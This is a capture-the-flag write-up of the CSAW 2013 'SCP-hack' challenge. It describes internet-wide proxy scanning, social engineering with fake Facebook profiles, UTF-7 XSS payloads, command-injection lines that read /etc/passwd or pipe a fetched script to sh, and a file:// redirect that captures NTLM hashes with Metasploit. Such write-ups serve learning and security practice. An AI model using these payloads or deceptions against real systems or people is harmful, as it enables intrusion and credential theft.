CSAW 2013 Quals - Exploitation 500: SCP-hack

The main contributions to solving this challenge came from acez, fish, mweissbacher, zardus, and me. Most of the time, two to three people worked on it while the others were taking apart other challenges. Because we took several different approaches, we would rather tell the tale of how we approached and solved it, including all the obstacles we faced along the way, than provide a write-up on how to solve it quickly.



Stage 1: Proving to be International

At some point during the first 24 hours of the qualification round, we decided to actually jump on the challenge and we were presented with very simple instructions:

You are welcome to join the SCP community, but first you must prove you are "International". Use your SCP invitation code and prove yourself.

We saw that the flag of the United States was shown instead of being transparent and, after a quick glance at the source on GitHub, figured that we needed to visit the website with our invite code (which was passed to the website via a GET request) from IP addresses in each of the countries marked as required. Doing so would grant us access to the internal part and, with it, the backend. To identify those countries, we looked at the DOM, which already contained the ISO 3166-1 alpha-2 code for each country. From left to right, they correspond to:

- th: Thailand

- is: Iceland

- st: São Tomé and Príncipe

- at: Austria

- ec: Ecuador

- an: Netherlands Antilles

- ro: Romania

- ck: Cook Islands

A somewhat interesting fact we discovered is that the sixth country, the Netherlands Antilles, was actually dissolved in 2010. Ultimately, we were quite lucky that the GeoIP database in use still mapped IP addresses to the Netherlands Antilles. The next step was to find ways to visit the website from those countries.

Fast Five

We started by checking whether any web proxies or open proxies existed that we could use quickly, without having to resort to more extravagant or absurd techniques. For five of those countries, namely Thailand, Iceland, Austria, Ecuador, and Romania, we were in luck and found working proxies through the following websites:

Please be careful: some of these websites might be malicious.

http://hidemyass.com/proxy-list/

http://www.xroxy.com/proxylist.htm

http://www.aliveproxy.com/

http://proxylist.insane.com/

http://www.atomintersoft.com/

http://www.proxynova.com/proxy-server-list

We activated the first five countries pretty quickly; in the end, it took maybe 20 minutes. Getting two of the remaining three countries marked was going to be much more difficult.

Two More to Go

For the remaining countries, São Tomé and Príncipe, the Netherlands Antilles, and the Cook Islands, we were out of luck though. While we found proxies, they responded far too slowly, and the TCP connections timed out and were reset regularly. We were unable to get even a single request through in hours of continuous requests (we decided to script it, just in case).

We decided it was time for a more offensive approach: let’s find open proxies in those countries by simply port scanning each country’s entire IP range. Luckily for us, we have access to some machines that are designated for tasks like this. We gathered the most likely ports from the proxy websites above (80, 1080, 3128, 8000, 8080, and 8888) and identified the IP ranges for each of the countries:

# IP Range for Cook Islands

202.65.32.0/19

# IP range for São Tomé and Príncipe

197.159.160.0/19

# IP ranges for Netherlands Antilles

186.190.240.0/20

190.2.128.0/19

190.2.160.0/19

190.89.0.0/18

190.89.64.0/18

190.89.128.0/17

190.102.0.0/20

190.102.16.0/20

190.121.208.0/20

190.121.240.0/20

190.185.0.0/18

190.185.64.0/20

190.185.80.0/20

196.3.16.0/20

200.7.32.0/20

200.7.48.0/20

200.26.224.0/20

200.26.240.0/20

200.124.128.0/20

200.124.144.0/20

201.216.64.0/19

201.216.96.0/19

We fed those two data sources into a bash script and started to port-scan the entire IP range of the three countries with zmap, a network scanner built for Internet-wide studies; the corresponding paper was recently presented at USENIX Security 2013.

On those machines, a single run of this bash script took roughly one to two hours to complete, with the scanning part of the script taking about 20 minutes. While we were waiting for the script to finish, we switched over to solving other challenges. Once it finished, we checked the website again and saw that we had gotten at least one request through a proxy from the Cook Islands. We were at 6/7!
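To get a feeling for the size of that search space, the ranges and ports listed above can be combined in a few lines of Python. This is only a rough sketch and not the script we ran: `count_probes` and `try_proxy` are hypothetical helper names, and the proxy check assumes a plain HTTP proxy that forwards a GET request for the invite URL.

```python
import http.client
import ipaddress
import urllib.request

# Candidate proxy ports and one of the country ranges from the text above.
PORTS = [80, 1080, 3128, 8000, 8080, 8888]
COOK_ISLANDS = ["202.65.32.0/19"]


def count_probes(cidrs, ports):
    """Number of (address, port) pairs a full scan of the ranges has to cover."""
    addresses = sum(ipaddress.ip_network(cidr).num_addresses for cidr in cidrs)
    return addresses * len(ports)


def try_proxy(host, port, url, timeout=10):
    """Return True if an HTTP request for url succeeds through host:port.

    Assumption: the candidate speaks plain HTTP proxying. Slow or broken
    proxies simply count as failures.
    """
    handler = urllib.request.ProxyHandler({"http": f"http://{host}:{port}"})
    opener = urllib.request.build_opener(handler)
    try:
        with opener.open(url, timeout=timeout) as response:
            return response.status == 200
    except (OSError, http.client.HTTPException):
        return False


print(count_probes(COOK_ISLANDS, PORTS))
```

A single /19 combined with six ports already amounts to 49,152 probes, which is why a fast scanner for the discovery step and a separate, slower verification step per open port made sense.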

Unfortunately, we were still missing a request from São Tomé and Príncipe or the Netherlands Antilles. We figured that zmap might have missed some open proxies because they responded too slowly or were offline, so we kicked off the script again, this time without searching for proxies from the Cook Islands. While we found a different set of proxies this time, none of them worked reliably and we were forced to pursue other ideas. We tried looking up the Tor project’s exit nodes and VPS or VPN providers in those countries, without any luck.

Our search for alternatives next led us to chat rooms, both web and IRC. We hoped to find people from those countries who were online and could quickly click on our link. We searched for channels of or for those countries, and also for the countries the Netherlands Antilles split into (Aruba, Curaçao, Sint Maarten, and the Caribbean Netherlands), but again without any luck.

It seemed that we had to become a bit more creative. It was time for social engineering. We created fake Facebook profiles (Jenny and James), copied together a semi-legit background that would survive a quick check by potential friends, and started to befriend people. We told them that we had just moved to the country and tried to motivate them to click on a custom link that redirected to the invite site. Since we didn’t get any response quickly, we went down another route and hoped to increase our chances by broadening our social engineering attempts, such as filling out contact forms of companies in those countries with some boilerplate to encourage the recipient to visit our invite site.

Ultimately, since it was getting late and the people in the two countries we had just tried to social engineer were asleep already, we decided to follow suit and get some sleep as well. We just kept our search script running. In the end, it was hit or miss and we couldn’t do much but wait and keep our fingers crossed. When we woke up the next morning, we woke up to new flags galore, including one from the Netherlands Antilles. While we did make it, we are actually not sure which approach was responsible, but we were at 7/7 and could finally get to Stage 2!

List of countries from which we were able to visit the website

Stage 2: Exploiting the Backend

In all honesty, our quest to exploit Stage 2 was an exhausting and long one: we took two very long detours before we finally arrived at the solution. In particular, the following hint threw us off the main trail for a long time:

if you can take advantage of their interns sloppy coding and outdated browser

We started with uploading a simple certificate request first. This certificate request’s commonName pointed to a server under our control that was simply listening on port 80 with netcat. The incoming request looked like the following:

# incoming http request

Connection from 128.238.66.211 port 80 [tcp/http] accepted

GET / HTTP/1.1

Referer: http://intern-box.thescpinternational.local/

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)

Accept: */*

Host: x.cao.vc

# command to create the certificate request

openssl req -newkey rsa:1024 -nodes -keyout key -out csr

As a next step, we decided to look up the User-Agent and, lo and behold, found an official blog post on MSDN, "Internet Explorer 7 User Agent String":

# IE7 running on Longhorn will send the following User-Agent header

Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)

Given the hint that they were using an outdated browser, we figured we needed to exploit the browser. Well, that shouldn’t be too hard to exploit: Internet Explorer 7 Beta running on Longhorn, or should it? A simple XSS and Metasploit in the back should do the trick, or so we thought.

XSS

Since we were injecting code into a website, our first approach was to try to inject a cross-site scripting snippet and, as mentioned, to redirect the browser and exploit it.

To get the XSS working, we set up our own local test infrastructure with the backend code that we were able to get from [GitHub](https://github.com/scp-international/scp-cert-parser/blob/master/parser_server.py), which just required some simple fixing of the parts that were broken.

Shortly after, we had a locally working XSS that redirected the browser to Metasploit and we were able to exploit an unpatched IE7 on Windows XP.

Too bad for us, it didn’t work remotely.

We started to reduce the XSS to the bare essentials and went even further to find out what the bot was doing differently than our browser.

We found out that the commonName was being sanitized in a way that was not part of the source we found on GitHub; maybe this was what the create_cert function was responsible for? We were able to narrow down the set of characters that were not URL-encoded by the backend or bot to the following:

# characters that are not sanitized / being replaced

#$&'()*+,-./0123456789=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]_abcdefghijklmnopqrstuvwxyz~!

Being restricted to this subset made injecting a redirection much harder, though not impossible.

The angle brackets (< and >) were not available, we had no double quotes to close the open src attribute, and we could not use spaces either.
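The restriction is easy to check mechanically. The following minimal sketch takes the surviving characters listed above and reports which characters of a candidate payload would be mangled; `blocked_characters` is a hypothetical helper name.

```python
# Characters that survived the sanitization, copied from the list above.
ALLOWED = set(
    "#$&'()*+,-./0123456789=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]_abcdefghijklmnopqrstuvwxyz~!"
)


def blocked_characters(payload):
    """Return the characters of payload outside ALLOWED, in order of first use."""
    seen = []
    for ch in payload:
        if ch not in ALLOWED and ch not in seen:
            seen.append(ch)
    return seen


payload = '"><script>window.location=\'//x.cao.vc\'</script><img/src="'
print(blocked_characters(payload))
```

For the plain redirection payload, this reports the double quote and both angle brackets, which are exactly the characters that need to be smuggled past the filter.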

Some quick research pointed us to a possible solution: the backend code does not seem to set the charset! It should, theoretically, be possible to leverage UTF-7 and trick IE7 into auto-selecting the encoding, thus executing our XSS snippet without having to utilize the inequality signs or double quotes directly.

We could then get rid of the space simply by replacing it with a /, which IE7 treats as a separator.

We combined those two techniques and we ended up with the following string:

# JavaScript redirection

"><script>window.location='//x.cao.vc'</script><img/src="

+/v8-+ACIAPgA8-script+AD4-window.location+AD0-'//x.cao.vc'+ADw-/script+AD4APA-img/src+AD0AIg-
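The encoded form above can be reproduced with a small hand-rolled encoder. This is a sketch under the assumption that only the RFC 2152 "Set D" characters are left unencoded and everything else goes into a base64 run; `utf7_encode` is a hypothetical name, and the `+/v8-` prefix is the UTF-7 byte order mark.

```python
import base64
import string

# RFC 2152 "Set D": characters that may always appear unencoded in UTF-7.
SET_D = set(string.ascii_letters + string.digits + "'(),-./:?")

UTF7_BOM = "+/v8-"


def utf7_encode(text):
    """Encode text as UTF-7, base64-encoding every character outside Set D."""
    out = []
    run = []  # consecutive characters waiting to be base64-encoded

    def flush():
        if run:
            raw = "".join(run).encode("utf-16-be")
            b64 = base64.b64encode(raw).decode("ascii").rstrip("=")
            out.append("+" + b64 + "-")  # always terminate the run explicitly
            run.clear()

    for ch in text:
        if ch in SET_D:
            flush()
            out.append(ch)
        else:
            run.append(ch)
    flush()
    return "".join(out)


payload = '"><script>window.location=\'//x.cao.vc\'</script><img/src="'
encoded = UTF7_BOM + utf7_encode(payload)
print(encoded)
```

The result consists only of letters, digits, and the characters `+ - / ' .`, all of which pass the filter unchanged.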

While the XSS worked locally, we could not get it to work remotely. Something else had to be stopping us from XSS’ing the bot. Was it JavaScript? Was JavaScript disabled? To verify this assumption, we simply tried redirecting the bot via a meta refresh instead (again in UTF-7 since we cannot simply open or close tags):

# meta refresh redirection

"><meta/http-equiv="refresh"/content="1;url=//x.cao.vc"/><img/src="

+/v8-+ACIAPgA8-meta/http-equiv+AD0AIg-refresh+ACI-/content+AD0AIg-1+ADs-url+AD0-//x.cao.vc+ACI-/+AD4APA-img/src+AD0AIg-
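A quick way to double-check such a string before uploading it is to decode it again. The sketch below uses Python's built-in `utf-7` codec for that; the codec keeps the leading byte order mark as U+FEFF, so it is stripped before printing.

```python
# The UTF-7 encoded meta refresh payload from above.
encoded = (
    b"+/v8-+ACIAPgA8-meta/http-equiv+AD0AIg-refresh+ACI-/content+AD0AIg-"
    b"1+ADs-url+AD0-//x.cao.vc+ACI-/+AD4APA-img/src+AD0AIg-"
)

decoded = encoded.decode("utf-7")

# The first code point is the byte order mark; the rest is the HTML snippet.
print(decoded.lstrip("\ufeff"))
```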

The meta refresh didn’t seem to work either and we briefly looked into a few other techniques to redirect the browser, but ultimately dismissed the idea that we should leverage an XSS to get the key.

After hours of frustration, we decided that it was time to give the other protocols another try.

We decided to start with FTP and wrote a simple stub to handle FTP authentication quickly.

Finally, the FTP authentication routine gave us some more information: the password the FTP client authenticated with was -wget@.

Exactly the default password wget uses.

Have we been wrong the whole time?

Was this maybe not an XSS vulnerability but instead command injection on the shell? Was the URL simply being passed to wget, so that we could inject arbitrary commands?
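The FTP stub mentioned above does not need to be more than a few lines. The following is a minimal sketch of the idea and not our original code: it speaks just enough FTP to receive `USER` and `PASS` and logs both. The names `handle_ftp_login`, `LoggingFTPHandler`, and `serve`, as well as port 2121, are assumptions made for illustration.

```python
import socketserver


def handle_ftp_login(rfile, wfile):
    """Speak just enough FTP to read USER and PASS; return (user, password)."""
    user = password = None
    wfile.write(b"220 ready\r\n")
    for raw in rfile:
        line = raw.decode("latin-1").rstrip("\r\n")
        command, _, argument = line.partition(" ")
        command = command.upper()
        if command == "USER":
            user = argument
            wfile.write(b"331 password required\r\n")
        elif command == "PASS":
            password = argument
            wfile.write(b"230 logged in\r\n")
            break  # we only care about the credentials
        else:
            wfile.write(b"502 not implemented\r\n")
    return user, password


class LoggingFTPHandler(socketserver.StreamRequestHandler):
    """Log the credentials of every client that connects."""

    def handle(self):
        user, password = handle_ftp_login(self.rfile, self.wfile)
        print(f"{self.client_address[0]} USER={user!r} PASS={password!r}")


def serve(port=2121):
    """Listen until interrupted; the real FTP port 21 needs privileges."""
    with socketserver.TCPServer(("0.0.0.0", port), LoggingFTPHandler) as server:
        server.serve_forever()
```

Calling `serve()` starts the listener. A client such as wget that logs in anonymously would then show up with the password `-wget@`.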

Command Injection

Our next approach to solving this challenge was trying to inject commands into the URL.

We started by trying the standard command injection through backticks and $(), for instance, trying to cat a file:

# cat command injection via backticks

ftp://x.cao.vc/`cat /etc/passwd`

# cat command injection via $()

ftp://x.cao.vc/$(cat /etc/passwd)

In the end, all of those commands were simply passed through and showed up in our log in the GET request to retrieve the file. As an alternative, we briefly looked into downloading a shell script and executing it via wget, but without success.

# command injection that pipes a downloaded script to sh

ftp://x.cao.vc/x.sh" -O - | sh #
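One plausible explanation for why the backticks and `$()` arrived verbatim is that the URL never passed through a shell at all. We do not know how the bot invoked its downloader; the sketch below merely illustrates, with a harmless child process standing in for the downloader, that an argument handed over as a list element is not interpreted by any shell. `pass_as_argument` is a hypothetical name.

```python
import subprocess
import sys


def pass_as_argument(url):
    """Run a child process with url as one argv element; return what it saw."""
    # The child is a Python one-liner standing in for the real downloader.
    child = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", url]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    return result.stdout


url = "ftp://x.cao.vc/$(cat /etc/passwd)"
print(pass_as_argument(url))
```

The child receives the string unchanged, including `$(...)`, which matches what we saw in our logs.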

After we had spent quite some time trying to get command injection to work, we moved on and tried to exploit the only remaining protocol: file://, which finally let us find the key.

Solution: file://

At some point during the hours we spent working on XSS and command injection, we realized that it should be possible to redirect the browser to an arbitrary scheme simply via HTTP redirects. We tried to redirect the browser to URIs that pointed to network shares (smb://), but to no avail. After our previous failed attempts, we came to the conclusion that the bot responsible for visiting the http:// and ftp:// schemes was using wget, or was based on wget, and that we would need to exploit the file:// functionality instead.

It all came together now: what would happen if we used file:// on a remote target? To a sane person, this sounds a bit crazy. It sounds like an illegal target that shouldn’t work, but maybe it is valid on Windows? What would the normal behavior be? Much to our surprise, this is actually a legitimate target for Internet Explorer (via MSDN: File URIs in Windows) and a remote share is accessed. We took out Metasploit, loaded up the proper module (auxiliary/server/capture/smb), uploaded a certificate with a commonName of file://remote-target, and we finally got the key:

[*] SMB Captured - 2013-09-22 03:07:18 +0000

NTLMv2 Response Captured from 54.242.104.202:33360 - 54.242.104.202

USER:key=whereisthedirtysmellysauce DOMAIN:WORKGROUP OS:Unix LM:Samba

LMHASH:76e3e5ef1046e6856eb03b17a86cb3e4 LM_CLIENT_CHALLENGE:921abce4cb5e9064

NTHASH:054be1ff5be1540f318d1be5350c77c6 NT_CLIENT_CHALLENGE:01010000000000008010cdeb55b3ce01ff61cba57e9d033a000000000200120057004f0052004b00470052004f00550050000100000000000000
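The reason a file:// URI with a host part ends up as an SMB connection is that Windows maps it to a UNC path. The following sketch shows that mapping; `file_uri_to_unc` is a hypothetical helper, and the share and file names in the example are made up for illustration.

```python
from urllib.parse import unquote, urlsplit


def file_uri_to_unc(uri):
    """Translate file://host/share/path into the UNC form \\\\host\\share\\path."""
    parts = urlsplit(uri)
    if parts.scheme != "file" or not parts.netloc:
        raise ValueError("not a file URI with a remote host")
    path = unquote(parts.path).replace("/", "\\")
    return "\\\\" + parts.netloc + path


# "share/key.txt" is a made-up path; only the host part matters for the capture.
print(file_uri_to_unc("file://remote-target/share/key.txt"))
```

Whoever resolves such a path authenticates against the named host, which is what allowed the capture module to record the user name shown above.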

In the end, we have to admit that the name of the challenge was not too far off what the solution ended up being. SMB and SCP are both protocols used primarily to copy files via a network connection and the first stage required you to be indeed quite international. Thanks for reading :)